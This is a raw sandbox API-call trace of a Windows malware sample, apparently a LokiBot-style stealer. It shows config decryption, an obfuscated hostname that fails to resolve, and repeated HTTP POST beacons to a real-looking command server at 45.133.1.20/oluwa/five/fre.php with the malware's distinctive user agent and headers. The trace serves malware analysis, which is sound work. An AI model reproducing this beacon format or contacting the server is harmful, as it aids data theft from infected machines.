getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.031] GetProcessHeap () returned 0x6a0000 [0267.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0267.032] GetProcessHeap () returned 0x6a0000 [0267.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.032] GetProcessHeap () returned 0x6a0000 [0267.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0267.032] GetProcessHeap () returned 0x6a0000 [0267.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0267.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0267.047] GetProcessHeap () returned 0x6a0000 [0267.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0267.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.048] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0267.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.049] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.050] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.050] GetProcessHeap () returned 0x6a0000 [0267.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0267.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.051] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0267.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.053] CryptDestroyKey (hKey=0x6ad060) returned 1 [0267.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.053] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0267.053] GetProcessHeap () returned 0x6a0000 [0267.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.055] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0267.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.055] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0267.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.056] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0267.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.057] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0267.057] GetProcessHeap () returned 0x6a0000 [0267.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0267.057] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0267.058] GetProcessHeap () returned 0x6a0000 [0267.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0267.058] socket (af=2, type=1, protocol=6) returned 0x948 [0267.058] connect (s=0x948, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0267.086] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0267.086] GetProcessHeap () returned 0x6a0000 [0267.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0267.086] GetProcessHeap () returned 0x6a0000 [0267.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0267.086] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.088] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.088] GetProcessHeap () returned 0x6a0000 [0267.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5f0 [0267.088] GetProcessHeap () returned 0x6a0000 [0267.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0267.088] GetProcessHeap () returned 0x6a0000 [0267.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0267.089] GetProcessHeap () returned 0x6a0000 [0267.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0267.089] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.090] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.090] GetProcessHeap () returned 0x6a0000 [0267.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0267.091] GetProcessHeap () returned 0x6a0000 [0267.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0267.091] send (s=0x948, buf=0x6bd460*, len=242, flags=0) returned 242 [0267.092] send (s=0x948, buf=0x6bb998*, len=159, flags=0) returned 159 [0267.092] GetProcessHeap () returned 0x6a0000 [0267.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0267.092] recv (in: s=0x948, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0267.179] GetProcessHeap () returned 0x6a0000 [0267.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0267.179] GetProcessHeap () returned 0x6a0000 [0267.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0267.180] GetProcessHeap () returned 0x6a0000 [0267.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0267.180] GetProcessHeap () returned 0x6a0000 [0267.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0267.181] closesocket (s=0x948) returned 0 [0267.181] GetProcessHeap () returned 0x6a0000 [0267.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0267.181] GetProcessHeap () returned 0x6a0000 [0267.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.183] GetProcessHeap () returned 0x6a0000 [0267.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0267.183] GetProcessHeap () returned 0x6a0000 [0267.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0267.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16c4) returned 0x948 [0267.186] Sleep (dwMilliseconds=0xea60) [0267.188] GetProcessHeap () returned 0x6a0000 [0267.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0267.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0267.207] GetProcessHeap () returned 0x6a0000 [0267.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0267.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.209] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0267.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.210] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.212] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.212] GetProcessHeap () returned 0x6a0000 [0267.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0267.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.213] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0267.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.215] CryptDestroyKey (hKey=0x6ad020) returned 1 [0267.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.216] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0267.216] GetProcessHeap () returned 0x6a0000 [0267.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.254] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.255] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.256] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.258] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.258] GetProcessHeap () returned 0x6a0000 [0267.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0267.258] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.258] GetProcessHeap () returned 0x6a0000 [0267.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0267.259] GetProcessHeap () returned 0x6a0000 [0267.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.260] GetProcessHeap () returned 0x6a0000 [0267.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0267.260] GetProcessHeap () returned 0x6a0000 [0267.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0267.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0267.291] GetProcessHeap () returned 0x6a0000 [0267.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0267.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.292] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0267.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.294] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.295] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.295] GetProcessHeap () returned 0x6a0000 [0267.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0267.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.297] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0267.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.298] CryptDestroyKey (hKey=0x6ad020) returned 1 [0267.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.301] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0267.301] GetProcessHeap () returned 0x6a0000 [0267.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0267.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.303] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0267.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0267.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.306] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0267.306] GetProcessHeap () returned 0x6a0000 [0267.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0267.306] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0267.306] GetProcessHeap () returned 0x6a0000 [0267.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0267.306] socket (af=2, type=1, protocol=6) returned 0x94c [0267.306] connect (s=0x94c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0267.348] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0267.348] GetProcessHeap () returned 0x6a0000 [0267.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0267.348] GetProcessHeap () returned 0x6a0000 [0267.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0267.349] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.352] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.352] GetProcessHeap () returned 0x6a0000 [0267.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0267.352] GetProcessHeap () returned 0x6a0000 [0267.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0267.353] GetProcessHeap () returned 0x6a0000 [0267.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0267.353] GetProcessHeap () returned 0x6a0000 [0267.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0267.353] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.354] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.354] GetProcessHeap () returned 0x6a0000 [0267.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0267.354] GetProcessHeap () returned 0x6a0000 [0267.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0267.354] send (s=0x94c, buf=0x6bd460*, len=242, flags=0) returned 242 [0267.357] send (s=0x94c, buf=0x6bb998*, len=159, flags=0) returned 159 [0267.357] GetProcessHeap () returned 0x6a0000 [0267.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0267.357] recv (in: s=0x94c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0267.444] GetProcessHeap () returned 0x6a0000 [0267.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0267.445] GetProcessHeap () returned 0x6a0000 [0267.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0267.445] GetProcessHeap () returned 0x6a0000 [0267.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0267.446] GetProcessHeap () returned 0x6a0000 [0267.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0267.446] closesocket (s=0x94c) returned 0 [0267.447] GetProcessHeap () returned 0x6a0000 [0267.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0267.447] GetProcessHeap () returned 0x6a0000 [0267.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.447] GetProcessHeap () returned 0x6a0000 [0267.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0267.447] GetProcessHeap () returned 0x6a0000 [0267.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0267.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16cc) returned 0x94c [0267.450] Sleep (dwMilliseconds=0xea60) [0267.452] GetProcessHeap () returned 0x6a0000 [0267.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0267.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0267.513] GetProcessHeap () returned 0x6a0000 [0267.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0267.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.514] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0267.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.516] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.517] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.517] GetProcessHeap () returned 0x6a0000 [0267.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0267.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.519] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0267.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.520] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0267.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.522] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0267.522] GetProcessHeap () returned 0x6a0000 [0267.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.527] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.529] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.530] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.531] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.531] GetProcessHeap () returned 0x6a0000 [0267.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0267.531] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.531] GetProcessHeap () returned 0x6a0000 [0267.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0267.532] GetProcessHeap () returned 0x6a0000 [0267.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.533] GetProcessHeap () returned 0x6a0000 [0267.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0267.533] 